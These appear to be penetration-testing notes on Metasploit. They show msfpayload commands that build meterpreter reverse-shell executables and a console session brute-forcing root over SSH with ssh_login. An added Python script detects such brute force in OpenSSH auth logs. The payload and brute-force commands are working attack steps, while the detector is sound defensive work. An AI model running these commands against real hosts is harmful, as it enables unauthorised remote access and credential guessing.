Metasploit penetration testing notes (internal network part)

x01 Reverse shell

File

The usual approach is to use msfpayload to generate a backdoor.exe, upload it to the target machine and run it there. A listener on the local machine then receives the meterpreter shell.

reverse_tcp/http/https => exe => victim => shell

reverse_tcp

Windows:

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe

Linux (x86):

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell

reverse_http

msfpayload windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe

reverse_https

msfpayload windows/meterpreter/reverse_https LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe

Login privileges

Ways of obtaining a meterpreter shell once some login credentials have already been obtained.

SSH

ssh_login

Module path: auxiliary/scanner/ssh/ssh_login

msf exploit(sshexec) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   RHOSTS                             yes       The target address range or CIDR identifier
   RPORT             22               yes       The target port
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads
   USERNAME                           no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true             no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104
RHOSTS => 192.168.1.104
msf auxiliary(ssh_login) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login) > set PASS
set PASSWORD set PASS_FILE
msf auxiliary(ssh_login) > set PASSWORD toor
PASSWORD => toor
msf auxiliary(ssh_login) > exploit

[*] 192.168.1.104:22 SSH - Starting bruteforce
[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: ''
[-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root':''
[*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root'
[-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root':'root'
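The ssh_login run above looks very different from the target's side: every guess (blank password, username-as-password, then PASSWORD) lands in sshd's auth log as a "Failed password" line from one source address, and a hit shows up as "Accepted password" from that same address moments later. The following Python script is an added detection example, not code from the notes or from Metasploit. It parses the standard OpenSSH auth.log line format, counts failures per source address in a sliding time window, and raises a higher-severity finding when a source that crossed the threshold then logs in successfully. The log lines, addresses, timestamps and the threshold/window values are constructed for the example; a real deployment would feed it the host's actual auth log and tune the numbers.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of what OpenSSH writes to auth.log while a password-guessing
# module such as auxiliary/scanner/ssh/ssh_login runs against it. Hosts, addresses
# and timestamps are invented for this example.
SAMPLE_AUTH_LOG = """\
Mar 10 12:00:01 host sshd[2101]: Failed password for root from 192.168.1.50 port 51234 ssh2
Mar 10 12:00:02 host sshd[2101]: Failed password for root from 192.168.1.50 port 51236 ssh2
Mar 10 12:00:02 host sshd[2102]: Failed password for invalid user admin from 192.168.1.50 port 51238 ssh2
Mar 10 12:00:03 host sshd[2103]: Failed password for root from 192.168.1.50 port 51240 ssh2
Mar 10 12:00:04 host sshd[2104]: Failed password for root from 192.168.1.50 port 51242 ssh2
Mar 10 12:00:05 host sshd[2105]: Accepted password for root from 192.168.1.50 port 51244 ssh2
Mar 10 12:05:00 host sshd[2110]: Failed password for alice from 10.0.0.7 port 40001 ssh2
Mar 10 12:07:00 host sshd[2111]: Accepted publickey for alice from 10.0.0.7 port 40002 ssh2
"""

# Matches the default OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip> port <n> ssh2" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_line(line, year=2024):
    """Parse one auth.log line into a dict, or return None for unrelated lines.
    syslog timestamps carry no year, so the caller supplies one (assumed 2024 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return a list of findings.

    A source address that accumulates `threshold` failed logins inside a sliding
    window of `window_seconds` gets one medium-severity finding. Any successful
    login from an address that was already flagged gets a high-severity finding,
    since that is what a guessed password looks like from the defender's side.
    """
    failures = defaultdict(deque)  # ip -> timestamps of recent failures (oldest first)
    flagged = {}                   # ip -> time it first crossed the threshold
    findings = []
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        if ev["result"] == "Failed":
            q = failures[ip]
            q.append(ts)
            # Drop failures that fell out of the window.
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = ts
                findings.append({"severity": "medium", "ip": ip,
                                 "reason": f"{len(q)} failed logins within {window_seconds}s"})
        elif ip in flagged:
            findings.append({"severity": "high", "ip": ip, "user": ev["user"],
                             "reason": f"successful {ev['method']} login after brute-force burst"})
    return findings


if __name__ == "__main__":
    for f in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f)
```

Run against the sample, the script reports 192.168.1.50 first for five failures within a minute and then again, at high severity, for the password login that follows; alice's single typo from 10.0.0.7 followed by a public-key login stays below the threshold and is not reported. The threshold of five is deliberately lower than most real-world settings because a module with STOP_ON_SUCCESS set may need only a handful of guesses when the password list is short.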
